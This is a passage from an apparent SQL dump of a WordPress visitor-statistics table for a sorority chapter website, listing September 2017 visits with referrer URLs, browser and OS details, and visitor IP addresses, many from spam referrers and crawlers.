','188.163.72.15','000',3,0),(11204,'2017-09-16','http://zphiblgz.org','Firefox','Macintosh','54.0','','138.197.69.208','000',1,0),(11205,'2017-09-16','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.69.208','000',1,0),(11206,'2017-09-16','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','138.197.69.208','000',1,0),(11207,'2017-09-16','http://zphiblgz.org','Firefox','Linux','49.0','','138.197.69.208','000',2,0),(11208,'2017-09-16','http://zphiblgz.org','Chrome','Windows','49.0.2623.75','','138.197.69.208','000',3,0),(11209,'2017-09-16','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','138.197.69.208','000',2,0),(11210,'2017-09-16','http://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','138.197.69.208','000',3,0),(11211,'2017-09-16','http://zphiblgz.org','Safari','Macintosh','10.0.3','','138.197.69.208','000',2,0),(11212,'2017-09-16','http://zphiblgz.org','Firefox','Windows','54.0','','138.197.69.208','000',1,0),(11213,'2017-09-16','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.34.19','000',1,0),(11214,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','39.48.109.80','000',2,0),(11215,'2017-09-16','http://zphiblgz.org','Firefox','Windows','40.1','','126.60.56.167','000',2,0),(11216,'2017-09-17','http://zphiblgz.org/wp-admin/admin.php?page=hopeful&tab=theme_update','Chrome','Windows','61.0.3163.79','','198.51.197.174','000',714,0),(11217,'2017-09-17','http://zphiblgz.org','Firefox','Windows','40.1','','112.202.165.224','000',2,0),(11218,'2017-09-17','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.179','000',2,0),(11219,'2017-09-17','http://yoshkarola.zrus.org/','Opera','Windows','9.00','','46.118.158.19','000',3,0),(11220,'2017-09-17','http://deshevo-nedorogo.ru/','MSIE','Windows','6.0','','46.118.158.19','000',2,0),(11221,'2017-09-17','http://zphiblgz.org','Firefox','Windows','40.1','','217.66.160.136','000',2,0),(11222,'2017-09-17','http://zphiblgz.org','Firefox','Windows','40.1','','72.0.248.39','000',2,0),(11223,'2017-09-17','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(11224,'2017-09-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.195.80.10','000',2,0),(11225,'2017-09-17','https://lechenie-gemorroya.com/','Unknown','Unknown','Unknown','','188.163.72.15','000',3,0),(11226,'2017-09-17','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1547.1Zh11ogu8ihPqCh2f6gUUegKcYyLW8r714br_aMEoc9NKFnM8e_VMRTN4GdkZ7Dg.37ee43f5b95a9fa5cc6ada8afc28abe407865480&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJtMm82dENyQzZ0NUt5SEppR0s2QmpRaGVObUdIMHEzbS1CWlE3b0ttX1FW&b64e=2&sign=e384e9767f8db063867f4ba4a37ad46e&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTThdb73IAmTj_COK4Jhv6Ppj_2N_jEvZqVsP3Wanx1Pq44OtJTa34L06A-2fv4tJT-HskCd4Tk_aWXIJaJXjFkZOpPRbt81mx0Wu5Flm9yONJvOtbyyVqgXEp5ZR2lLrwL&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV-bB70LKhDfIHaWbJEmIo3Rrmmz4ZEhqzVpf_-FQk73NxA2pOh8OSw70xjsagIjM_6RV0iap2z6Q&l10n=ru&cts=1505660106216&mc=4.43247229553','Firefox','Windows','53.0','','85.141.67.88','000',1,0),(11227,'2017-09-17','http://zphiblgz.org','Wget','Linux','1.12','','123.126.113.250','000',1,0),(11228,'2017-09-17','http://zphiblgz.org','Firefox','Windows','40.1','','103.224.144.228','000',2,0),(11229,'2017-09-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.75','000',1,0),(11230,'2017-09-17','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.223.200','000',1,0),(11231,'2017-09-17','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.140','000',1,0),(11232,'2017-09-17','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','206.41.182.63','000',1,0),(11233,'2017-09-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(11234,'2017-09-17','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(11235,'2017-09-17','http://artel116.ru/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(11236,'2017-09-17','http://zphiblgz.org','Firefox','Windows','40.1','','84.10.183.154','000',2,0),(11237,'2017-09-17','http://zphiblgz.org','Firefox','Windows','40.1','','2.223.123.50','000',2,0),(11238,'2017-09-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.139.8.104','000',2,0),(11239,'2017-09-17','http://zphiblgz.org','Firefox','Windows','40.1','','72.252.233.149','000',2,0),(11240,'2017-09-17','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(11241,'2017-09-17','http://life-instyle.com/','MSIE','Windows','6.0','','46.118.154.197','000',1,0),(11242,'2017-09-17','http://komputers-best.ru/','Opera','Windows','7.11','','46.118.159.26','000',3,0),(11243,'2017-09-17','android-app://com.google.android.googlequicksearchbox','Chrome','Android','60.0.3112.116','','68.33.94.8','000',3,0),(11244,'2017-09-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(11245,'2017-09-17','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1547.TFVzVFkH96sYIXgHGTyLUCUH9ySSNdxTmBWYAsZLgFPugqz7WnHGu2X5FWCjWcs0.4f68dc91d8a3bbb86374ebc1480434347666b1e7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJocVgzdHNaQ1BSemt6S1J0a1ZuQUJ4LVRRc0pLeGVlbGtPdVVTUGZ5Mlhp&b64e=2&sign=9213058880ca8247ac28371e8d2a74d5&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4nFLNlcsBSxwtOcCwjsSGEUWBmUJHiv0SzHnGTeIHlxKNrRXBNKhOwLLgEh1pKn4rKzPhOxSOydnNDPOURjghxbh_WAMboJNAnQDaWqHFbvIrBCfqYbJdPaTWSCYhmKH9&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXmyCrj7VrKuITs4Zmm3Y6kOrEMYbFe5-NhBzb21IRyR78FVYpX4tfY8c-kheieikSQ1SWHHVuVcA&l10n=ru&cts=1505696410523&mc=4.83917536897','Firefox','Windows','53.0','','5.45.235.95','000',1,0),(11246,'2017-09-17','http://zphiblgz.org','Java','Unknown','1.8.0','','52.199.157.209','000',1,0),(11247,'2017-09-17','http://zphiblgz.org','Chrome','Macintosh','33.0.1750.152','','52.199.157.209','000',1,0),(11248,'2017-09-17','http://zphiblgz.org','Chrome','Linux','42.0.2352.0','','107.152.203.58','000',2,0),(11249,'2017-09-17','http://www.bing.com/search?q=zeta+phi+beta+sorority+inc-camden%2Csc&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','204.79.180.0','000',1,0),(11250,'2017-09-17','https://www.google.com/','Firefox','Windows','55.0','','98.204.240.196','000',1,0),(11251,'2017-09-17','https://minharevisao.com/','Opera','Windows','9.00','','188.163.72.15','000',3,0),(11252,'2017-09-17','http://technika-remont.ru/','MSIE','Unknown','6.0','','46.118.158.19','000',2,0),(11253,'2017-09-17','https://moetomnenie.com/','MSIE','Windows','6.0','','188.163.72.15','000',2,0),(11254,'2017-09-17','http://zphiblgz.org','MSIE','Windows','11.0','','37.147.54.201','000',2,0),(11255,'2017-09-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.211.230.94','000',2,0),(11256,'2017-09-18','http://zphiblgz.org/wp-admin/admin.php?page=hopeful&tab=theme_update','Chrome','Windows','61.0.3163.79','','198.51.197.174','000',283,0),(11257,'2017-09-18','https://stillmiracle.com/','Opera','Windows','9.01','','46.118.159.26','000',2,0),(11258,'2017-09-18','http://pavlodar.xkaz.org/','MSIE','Windows','6.0','','46.118.159.26','000',2,0),(11259,'2017-09-18','http://zphiblgz.org','Firefox','Windows','40.1','','123.201.103.75','000',2,0),(11260,'2017-09-18','http://life-instyle.com/eda.html','Unknown','Unknown','Unknown','','46.118.158.19','000',1,0),(11261,'2017-09-18','http://zphiblgz.org','Firefox','Windows','40.1','','5.51.124.16','000',2,0),(11262,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.254.79.66','000',2,0),(11263,'2017-09-18','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.70','000',2,0),(11264,'2017-09-18','http://www.osnova3.ru/','Unknown','Unknown','Unknown','','46.118.154.197','000',2,0),(11265,'2017-09-18','http://zphiblgz.org','Firefox','Windows','54.0','','138.197.111.48','000',1,0),(11266,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.163.85','000',3,0),(11267,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.51.91','000',2,0),(11268,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',2,0),(11269,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.254.166','000',1,0),(11270,'2017-09-18','http://pk-services.ru/','Opera','Windows','6.0','','188.163.72.15','000',1,0),(11271,'2017-09-18','http://zphiblgz.org','Chrome','Windows','26.0.1410.43','','5.196.66.162','000',15,0),(11272,'2017-09-18','http://zphiblgz.org','Chrome','Windows','26.0.1410.43','','170.250.140.52','000',1,0),(11273,'2017-09-18','http://zphiblgz.org','MSIE','Windows','11.0','','192.187.101.194','000',1,0),(11274,'2017-09-18','http://zphiblgz.org','Chrome','Android','60.0.3112.116','','174.205.24.73','000',1,0),(11275,'2017-09-18','http://zphiblgz.org','Chrome','Windows','60.0.3112.101','','216.152.103.22','000',2,0),(11276,'2017-09-18','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','150.148.14.145','000',2,0),(11277,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','155.4.230.97','000',2,0),(11278,'2017-09-18','http://zphiblgz.org','Chrome','Windows','60.0.3112.113','','208.76.113.4','000',9,0),(11279,'2017-09-18','http://www.zas1914.org/zas1914/index.php/links','Firefox','Windows','52.0','','198.120.224.16','000',2,0),(11280,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.38.208.57','000',2,0),(11281,'2017-09-18','http://xdoza.com/','MSIE','Windows','5.0','','46.118.154.197','000',1,0),(11282,'2017-09-18','http://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.104','000',1,0),(11283,'2017-09-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.124','000',1,0),(11284,'2017-09-18','https://frbizlist.com/','Opera','Windows','8.50','','46.118.154.197','000',3,0),(11285,'2017-09-18','http://zphiblgz.org','Firefox','Windows','40.1','','68.55.111.188','000',2,0),(11286,'2017-09-18','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(11287,'2017-09-18','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','140.185.96.57','000',2,0),(11288,'2017-09-18','http://www.google.com/','Chrome','Android','60.0.3112.116','','12.129.159.195','000',1,0),(11289,'2017-09-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(11290,'2017-09-18','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(11291,'2017-09-18','http://www.bing.com/search?q=zeta+phi+beta+sorority+inc-camden%2Csc&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','204.79.180.21','000',1,0),(11292,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.254.216.66','000',1,0),(11293,'2017-09-18','http://zphiblgz.org/','Firefox','Windows','7.0.1','','95.128.43.164','000',1,0),(11294,'2017-09-18','http://zphiblgz.org','Firefox','Windows','40.1','','41.97.50.182','000',2,0),(11295,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.31','000',1,0),(11296,'2017-09-18','http://zphiblgz.org/','Firefox','Windows','7.0.1','','173.208.153.75','000',1,0),(11297,'2017-09-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','144.217.92.145','000',1,0),(11298,'2017-09-18','http://zphiblgz.org','Firefox','Windows','40.1','','115.64.130.115','000',2,0),(11299,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.38.67','000',2,0),(11300,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.189.146.133','000',2,0),(11301,'2017-09-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.64','000',1,0),(11302,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.69.67.17','000',1,0),(11303,'2017-09-18','http://zphiblgz.org','Firefox','Windows','40.1','','170.246.98.188','000',2,0),(11304,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.227.114','000',2,0),(11305,'2017-09-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(11306,'2017-09-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.62','000',1,0),(11307,'2017-09-18','http://zphiblgz.org/event/new-membership-informational/','Firefox','Windows','43.0','','193.201.225.139','000',1,0),(11308,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.166','000',1,0),(11309,'2017-09-18','http://zphiblgz.org/','Firefox','Windows','7.0.1','','91.219.237.229','000',1,0),(11310,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.244.74.78','000',2,0),(11311,'2017-09-18','http://doxyporno.com/','Unknown','Unknown','Unknown','','46.118.159.26','000',2,0),(11312,'2017-09-18','https://kursy-ege.ru/','Unknown','Unknown','Unknown','','188.163.72.15','000',2,0),(11313,'2017-09-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.124.32.84','000',2,0),(11314,'2017-09-18','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','195.154.173.103','000',1,0),(11315,'2017-09-18','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','73.201.199.79','000',3,0),(11316,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.199.130.188','000',1,0),(11317,'2017-09-19','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.20.55.18','000',1,0),(11318,'2017-09-19','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',1,0),(11319,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.131','000',2,0),(11320,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',2,0),(11321,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','188.120.244.69','000',1,0),(11322,'2017-09-19','http://zphiblgz.org/','Firefox','Windows','7.0.1','','23.129.64.18','000',1,0),(11323,'2017-09-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','185.100.222.127','000',6,0),(11324,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.90.244.23','000',2,0),(11325,'2017-09-19','http://zphiblgz.org','Firefox','Macintosh','3.6.2','','158.69.252.227','000',1,0),(11326,'2017-09-19','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','185.154.15.120','000',1,0),(11327,'2017-09-19','http://zphiblgz.org','Firefox','Windows','40.1','','103.49.170.105','000',2,0),(11328,'2017-09-19','http://deshevo-nedorogo.ru/','Opera','Windows','9.00','','46.118.158.19','000',2,0),(11329,'2017-09-19','http://kaliningrad.zrus.org/','MSIE','Windows','5.5','','46.118.158.19','000',3,0),(11330,'2017-09-19','http://artel116.ru/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(11331,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.170.2.53','000',2,0),(11332,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.101','000',1,0),(11333,'2017-09-19','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','107.77.241.7','000',4,0),(11334,'2017-09-19','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(11335,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.246.21','000',1,0),(11336,'2017-09-19','http://zphiblgz.org/','Firefox','Windows','7.0.1','','91.219.237.244','000',1,0),(11337,'2017-09-19','https://mojaocena.com/','MSIE','Windows','6.0','','188.163.72.15','000',5,0),(11338,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.179.129','000',2,0),(11339,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.151.47','000',2,0),(11340,'2017-09-19','http://zphiblgz.org','Firefox','Windows','40.1','','146.196.32.109','000',2,0),(11341,'2017-09-19','http://14b.info/','MSIE','Windows','6.0','','46.118.154.197','000',3,0),(11342,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',3,0),(11343,'2017-09-19','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.163.1.11','000',1,0),(11344,'2017-09-19','http://zphiblgz.org','Android Browser','Android','4.0','','104.168.144.66','000',7,0),(11345,'2017-09-19','https://sevendays.com.ua/','MSIE','Windows','6.0','','46.118.159.26','000',4,0),(11346,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','158.255.6.242','000',1,0),(11347,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','158.69.215.7','000',2,0),(11348,'2017-09-19','http://zphiblgz.org','Firefox','Windows','40.1','','191.36.190.111','000',2,0),(11349,'2017-09-19','http://zphiblgz.org','Firefox','Windows','40.1','','105.105.86.195','000',2,0),(11350,'2017-09-19','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(11351,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.165','000',1,0),(11352,'2017-09-19','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.165.230.5','000',1,0),(11353,'2017-09-19','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(11354,'2017-09-19','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(11355,'2017-09-19','http://zphiblgz.org','Firefox','Windows','40.1','','78.63.208.58','000',2,0),(11356,'2017-09-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.26.144','000',12,0),(11357,'2017-09-19','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.26.144','000',1,0),(11358,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.163.85','000',2,0),(11359,'2017-09-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.53','000',1,0),(11360,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.7','000',2,0),(11361,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','84.19.181.25','000',2,0),(11362,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.59.119.196','000',1,0),(11363,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.226.108.26','000',2,0),(11364,'2017-09-19','https://search.yahoo.com/','Chrome','Windows','60.0.3112.113','','96.234.147.182','000',1,0),(11365,'2017-09-19','https://univerfiles.com/','MSIE','Windows','6.0','','46.118.158.19','000',3,0),(11366,'2017-09-19','http://zphiblgz.org','Firefox','Windows','40.1','','41.97.26.197','000',2,0),(11367,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.82.244','000',1,0),(11368,'2017-09-19','http://zphiblgz.org/','Firefox','Windows','7.0.1','','145.239.74.47','000',1,0),(11369,'2017-09-19','http://komp-pomosch.ru/','MSIE','Windows','5.5','','188.163.72.15','000',2,0),(11370,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.135','000',2,0),(11371,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.49','000',2,0),(11372,'2017-09-19','http://zphiblgz.org','Firefox','Windows','3.6.3','','54.145.5.105','000',1,0),(11373,'2017-09-19','http://zphiblgz.org/','Chrome','Windows','59.0.3071.104','','113.53.254.21','000',3,0),(11374,'2017-09-19','http://zphiblgz.org','MSIE','Windows','11.0','','87.244.161.32','000',1,0),(11375,'2017-09-19','http://zphiblgz.org','Firefox','Windows','40.1','','156.205.73.10','000',2,0),(11376,'2017-09-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.44','000',2,0),(11377,'2017-09-19','zphiblgz.org','Chrome','Windows','50.0.2661.75','','82.165.140.254','000',1,0),(11378,'2017-09-19','http://zphiblgz.org','Firefox','Windows','40.1','','188.4.205.210','000',2,0),(11379,'2017-09-19','http://zphiblgz.org/wp-cron.php?doing_wp_cron=1505882505.4270560741424560546875','WordPress','Unknown','4.7.5','','74.220.219.51','000',1,0),(11380,'2017-09-19','http://zphiblgz.org','Firefox','Windows','40.1','','24.67.149.31','000',2,0),(11381,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.248.1.85','000',2,0),(11382,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.134.120','000',2,0),(11383,'2017-09-20','http://zphiblgz.org/','Firefox','Windows','50.0','','109.108.42.154','000',4,0),(11384,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.11','000',1,0),(11385,'2017-09-20','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.112.254.195','000',1,0),(11386,'2017-09-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.62','000',1,0),(11387,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.79.167','000',1,0),(11388,'2017-09-20','zphiblgz.org','Chrome','Windows','47.0.1335.75','','123.57.226.252','000',1,0),(11389,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','23.129.64.16','000',2,0),(11390,'2017-09-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','82.165.140.254','000',1,0),(11391,'2017-09-20','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1550.GGk1d5MqsV3Qpib8Ai2ETmUDFKXSQLxRVz9FY-neq640QcLJeT7FCYsUG9azVpEW.24a88182e04f0052d79b217c1ee5cdb23ebdae82&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YM1sNxN_KHOPADPyHdOKa1Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJ2djFzLU1IaHQtRzVkaGNCMGxGOEhkeTlaZUJpQzZnT2JWRTRWck1xVDMy&b64e=2&sign=7a349acfdc174e132b0eaa5b6e82ca23&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6-_OnFLLiOiVQ3gbrS1HOrZUzpiZM0bM1p1K2uo66QkMMh1_vNBm2aa7f0yhJZk_Bsny29NM8V3oJzwajI0_b2YUEZyzdaUScVGb3Uy8X-Ku784QZCUCthe-zoFNGSrDz&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXQCTkazkxt73LNIJg0_tKSeq4Tw9lyJeGDnFyZRSF8u5zXWgmJXqCLfwyvosQHg-UGEp3eQPDQEw&l10n=ru&cts=1505892506852&mc=2.05089462114','Firefox','Windows','53.0','','5.228.20.248','000',1,0),(11392,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.70.217.179','000',2,0),(11393,'2017-09-20','zphiblgz.org','Chrome','Windows','5.0.375.99','','86.104.13.237','000',2,0),(11394,'2017-09-20','zphiblgz.org','Chrome','Windows','5.0.375.99','','78.46.90.170','000',1,0),(11395,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.23.239.44','000',2,0),(11396,'2017-09-20','http://zphiblgz.org','Firefox','Windows','40.1','','139.190.13.131','000',2,0),(11397,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.61','000',1,0),(11398,'2017-09-20','http://krasivoe-hd.net/','MSIE','Windows','6.0','','46.118.154.197','000',5,0),(11399,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.67.116','000',2,0),(11400,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.101','000',2,0),(11401,'2017-09-20','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(11402,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.87.185.45','000',1,0),(11403,'2017-09-20','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',2,0),(11404,'2017-09-20','http://zphiblgz.org','Chrome','Chrome OS','60.0.3112.112','','69.143.34.19','000',4,0),(11405,'2017-09-20','http://zphiblgz.org','Firefox','Windows','40.1','','4.16.174.210','000',2,0),(11406,'2017-09-20','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',4,0),(11407,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.254.216.66','000',4,0),(11408,'2017-09-20','http://zphiblgz.org','Firefox','Windows','40.1','','189.154.102.154','000',2,0),(11409,'2017-09-20','http://zphiblgz.org','Firefox','Macintosh','54.0','','8.21.241.134','000',5,0),(11410,'2017-09-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.119','000',1,0),(11411,'2017-09-20','http://www.zphibmaryland.org/chapters/','Chrome','Windows','60.0.3112.113','','69.195.247.116','000',2,0),(11412,'2017-09-20','http://www.zphibmaryland.org/chapters/','Chrome','Windows','60.0.3112.113','','38.124.128.33','000',3,0),(11413,'2017-09-20','http://zphiblgz.org','AppleWebKit','Macintosh','603.3.8','','72.76.39.227','000',1,0),(11414,'2017-09-20','http://zphiblgz.org','Safari','iPhone','10.0','','72.76.39.227','000',1,0),(11415,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',2,0),(11416,'2017-09-20','https://venerologiya.com/','MSIE','Windows','6.0','','188.163.72.15','000',2,0),(11417,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.170.212','000',2,0),(11418,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.74','000',1,0),(11419,'2017-09-20','http://zphiblgz.org/','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(11420,'2017-09-20','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.88.70','000',1,0),(11421,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.243','000',1,0),(11422,'2017-09-20','http://zphiblgz.org','Firefox','Windows','40.1','','96.41.42.244','000',2,0),(11423,'2017-09-20','http://zphiblgz.org','Chrome','Windows','53.0.2785.116','','54.202.125.157','000',1,0),(11424,'2017-09-20','http://zphiblgz.org','Chrome','Windows','61.0.3163.79','','214.36.0.135','000',1,0),(11425,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.179.129','000',1,0),(11426,'2017-09-20','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',4,0),(11427,'2017-09-20','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(11428,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.74.253','000',1,0),(11429,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',2,0),(11430,'2017-09-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.167.240','000',2,0),(11431,'2017-09-20','http://zphiblgz.org','Safari','iPhone','10.0','','204.126.132.241','000',1,0),(11432,'2017-09-20','http://zphiblgz.org','Chrome','Windows','61.0.3163.79','','198.51.197.174','000',4,0),(11433,'2017-09-20','http://zphiblgz.org/','Chrome','Linux','58.0.3029.110','','163.172.4.153','000',1,0),(11434,'2017-09-20','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1550.ffIcTrOvaXx_lwGbm7yORRGEFVvvx41wYNDqOXSssYzK59IfKKp_5r8FHw9z_nSE.2b89ac31e2c5e30578750fece7c152344293f87f&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSVVTQjdlcjE3RGJrVnhqQlVDSVljcEhBdDJESDJqaW11TkN3QjNiUUo5cmFNZEc4c2hlcVdK&b64e=2&sign=3ef1943dd895219379519a465f0217bf&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQln0sLf3I5a7J2tQKd